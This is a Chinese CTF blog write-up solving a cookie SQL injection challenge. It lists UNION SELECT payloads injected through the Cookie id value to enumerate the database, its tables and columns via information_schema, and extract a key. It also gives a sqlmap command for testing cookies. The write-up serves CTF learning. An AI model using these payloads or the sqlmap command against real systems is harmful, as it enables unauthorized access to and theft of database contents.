CTF---Web---SQL注入---08---Cookie注入

最新推荐文章于 2024-04-04 11:14:08 发布
最新推荐文章于 2024-04-04 11:14:08 发布
阅读量377 收藏 1
点赞数
分类专栏: 刷题记录 CTF web 文章标签: CTF web SQL注入 刷题记录 hgzzk
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22160557/article/details/119280752
版权
刷题记录 同时被 3 个专栏收录
24 篇文章 2 订阅
订阅专栏
CTF
24 篇文章 1 订阅
订阅专栏
web
24 篇文章 0 订阅
订阅专栏

文章目录

前言

题目分类:

CTF—Web—SQL注入—08—Cookie注入

一、题目描述

题目:cookie注入

二、解题步骤

1、找注入点

Step1:Cookie: id=0,1 union select 1,2,3 – l

此题的注入点是cookie中的id。

order by 只能在limit前使用,所以这里用不了order by,只能用union select 来判断字段数
在这里插入图片描述

2、爆库、表、列、字段

Step2:爆库

Cookie: id=0,1 union select 1,2,database() -- l

Step3:爆表,表名为key_1

Cookie:id = 0,1 union select 1,2,group_concat(table_name) from information_schema.tables  where  table_schema = database() --|

Step4:爆列,列名为thekey

Cookie: id = 0,1 union select 1,2, group_concat(column_name) from  information_schema.columns   where table_name = key_1  --|

Step5:爆段,出Key:B6F0D416884D5D34

Cookie: id=0,1 union  select 1,2,thekey from key_1 --|

在这里插入图片描述

三、总结

1、sqlmap如何跑Cookie注入

sqlmap.py -u "http://xxx.xxx.xx.xx/shownews.asp" --cookie "id=171" --level 2

注意:只有level 2以上sqlmap才会跑cookie

2、判断字段数:order by 与 select

order by 只能在limit前使用,所以这里用不了order by,只能用union select 来判断字段数

参考链接:https://blog.csdn.net/qq_35569814/article/details/100181778

ygxzq520
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
1. **SQL注入**:参赛者需要了解如何利用不安全的SQL查询来获取敏感信息,以及如何防御这类攻击,如参数化查询、输入验证和使用预编译语句。 2. **XSS(Cross Site Scripting)**:试题可能包含对XSS漏洞的利用,如...
CTF-Web10(cookie 只是一块饼干,不能存放任何隐私数据)
weixin_47059164的博客
08-21 199
知识点:HTTP 是无状态协议,说明它不能以状态来区分和管理请求和响应。也就是说,无法根据之前的状态进行本次的请求处理,所以出现了cookiecookie存储在浏览器上,协助服务器区分中两次请求是否由一个客户端发出。用途:网上商城的购物车 保持用户登录状态。
CTFHub | Cookie注入
尼泊罗河伯的博客
11-20 1722
根据网页显示内容提示,这题关于 Cookie 注入Cookie 注入和之前的注入手法一致,只不过需要在网页 Cookie 中修改其参数进行注入判断,那么直接打开工具 BurpSuite 对题目网站进行抓包。判断发现存在 Cookie 注入,接着判断字段数量,查看数据库位置和版本。使用注入常用流程爆库、爆表、爆数据。最后获得此题 flag 。
CTFHub技能树之WEBCookie注入
weixin_48799157的博客
03-20 1424
小白一个,如有错误请指正! 解法一:使用Burpsuite抓包 1.设置好Burpsuite后开始抓包 鼠标右键点击Send to Repeater 2.在Repeater界面发送数据包,发现可以看到返回的数据 3.可以发现Cookie的id可以传值,那我们通过Cookie进行注入 发现只有2个字段 有回显 有回显 没有回显 4.爆数据库 id=123 union select 1,database()# 5.爆表名 id=123 union select 1...
ctf题解——sql注入cookie注入
ckkkkkkkkke的博客
10-31 875
1.知识点   cookie注入的原理是:就要修改cookie的值,我们是将提交的参数已cookie方式提交了,而一般的注入我们是使用get或者post方式提交,get方式提交就是直接在网址后面加上需要注入的语句,post则是通过表单方式,get和post的不同之处就在于一个我们可以通过IE地址栏处看到我们提交的参数,而另外一个却不能。   相对post和get方式注入来说,cookie注入就要稍微繁琐一些了,要进行cookie注入,我们首先就要修改cookie,这里就需要使用到Javascript语言
sql注入预计完全体
最新发布
2303_81631620的博客
04-04 846
Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。通常被用来辨别用户身份、进行session跟踪,最典型的应用就是保存用户的账号和密码用来自动登录网站。
CTF-Challenges
06-29
解决这个CTF挑战需要具备上述PHP编程技能,并结合Web应用安全的基本知识,如了解常见的漏洞类型(如SQL注入、跨站脚本攻击等)以及如何防护它们。在尝试解决挑战时,逐步分析代码、调试、测试不同的输入和场景,直至...
bugkuctf解题-WEB
05-04
CTF(Capture The Flag)比赛中,Web安全领域是一个重要的环节,它涵盖了各种网络安全技能,如漏洞挖掘、代码审计、Web应用渗透测试等。本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验...
S2 AWD排位赛-6.zip
12-07
【S2 AWD排位赛-6.zip】这个压缩包文件是BugKu在2021年举办的一场Capture The Flag(CTF) Automated Web Defense(AWD)排位赛的真实比赛题目集合。CTF是一种信息安全竞赛,参赛者通过解决各种安全问题来得分,而...
TetCTF-2021
02-14
理解SQL语句和防止SQL注入至关重要。 5. **会话与cookie管理**:session_start()启动会话,$_SESSION数组存储用户信息;设置和获取cookie则涉及setcookie()和$_COOKIE。 6. **错误与异常处理**:理解错误报告级别...
POST、Cookie注入扫描和注入工具
03-11
功能慢全的,注入速度飞快!!! 应该会对注入者有所帮助
001-CTF web题型解题技巧-第一课 解题思路.pdf
07-09
以及各种代码审计工具,如Sqlmap,用于SQL注入攻击检测。熟悉并熟练运用这些工具,能够帮助快速定位问题和发掘隐藏信息。 在解题过程中,直接查看网页源码是基础操作。很多情况下,flag或者其他关键信息会被直接或...
毕业设计论坛源码jsp-WriteUp2017:某局CTF
06-06
毕业设计论坛源码jsp 安全检测专业论坛考试WriteUp 0x00前言 ...另外一处是个SQL注入。懒得对着屏幕一个个敲Cookie信息(内外网物理隔离),直接走注入注入地址是http://ip/admin/_content/_About/As
攻击JavaWeb应用1-9[JavaWeb安全系列]
04-02
1. SQL注入攻击:攻击者通过输入恶意SQL语句来获取、修改、删除数据库中的数据。防御措施包括使用预编译的SQL语句(如Java的PreparedStatement)、输入验证、以及使用ORM框架(如Hibernate)来减少直接的SQL操作。 ...
005-CTF web题型总结-第五课 CTF WEB实战练习(一).pdf
07-09
1. **Web2**:这是一道基础的Web安全题目,可能涉及到SQL注入或文件包含漏洞。参赛者需要理解HTTP请求构造,以及如何通过输入特定的数据来触发潜在的漏洞,获取敏感信息。 2. **计算器**:这道题可能测试的是逻辑...
cookie注入CTFHUB靶场)
weixin_54105551的博客
09-10 1369
因为是cookie注入,所以我们就把注意放在cookie上,发现cookie后面有一个id=1,我们加一个单引号,看看会不会报错。发现报错,存在注入,我们可以查看一下他的字段数,发现等于3的时候会报错,说明字段数等于二,然后我们可以开始暴库了。我们先用BP对靶场进行抓包,然后将抓到的数据发送到repeater。尝试一下用gagawesmtx这个表。得到数据库为sqli,然后开始爆表。
CTFHub-web(cookie注入)
m0_64444909的博客
04-11 5118
文章目录前言一、解题步骤二、使用步骤1.引入库2.读入数据总结 前言 一、解题步骤 (1)题目为cookie注入,我们首先先看一下cookie里的值有没有什么可以帮助我们思考的东西,id=i,很明显存在sql注入 (2)我们抓包来一步步的进行注入会更方便一些 1.我们用order by 语句来排序查询数据库有几行 (1,2都可以回显,直到3时无法回显,说明数据库有两行) id=1 order by 3; 2.接下来用联合查询语句union select语句来注入,从而判断显示位 (回显Data:2 正常)
CTFHub(Cookie注入
sGanYu
07-26 1874
手动注入 什么是cookie? 一种能够让网站服务器把少量数据储存到客户端的硬盘或内存,或是从客户端的硬盘读取数据的一种技术。当用户第一次访问页面的时候,服务器会生成一个用户特有的cookie,之后浏览器会根据用户设置的Cookie信息加载出内容,简单来说,cookie其实就是用户凭证的意思。 sqlmap注入 ...
CTFHUB-WEB-SQL注入-cookie注入
weixin_43486981的博客
08-11 890
利用cookie值进行注入(把cookie值作为注入点) 题目: 靶机环境:可以看到页面没有可以输入的地方,根据题目,想到利用cookie值输入 使用burp suite抓包,在cookie值处输入注入语句,进行注入 查看回显位 求数据库名 求表名 求列名 求字段值,即可得到flag ...
ctf-qsnctf此地无银三百
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值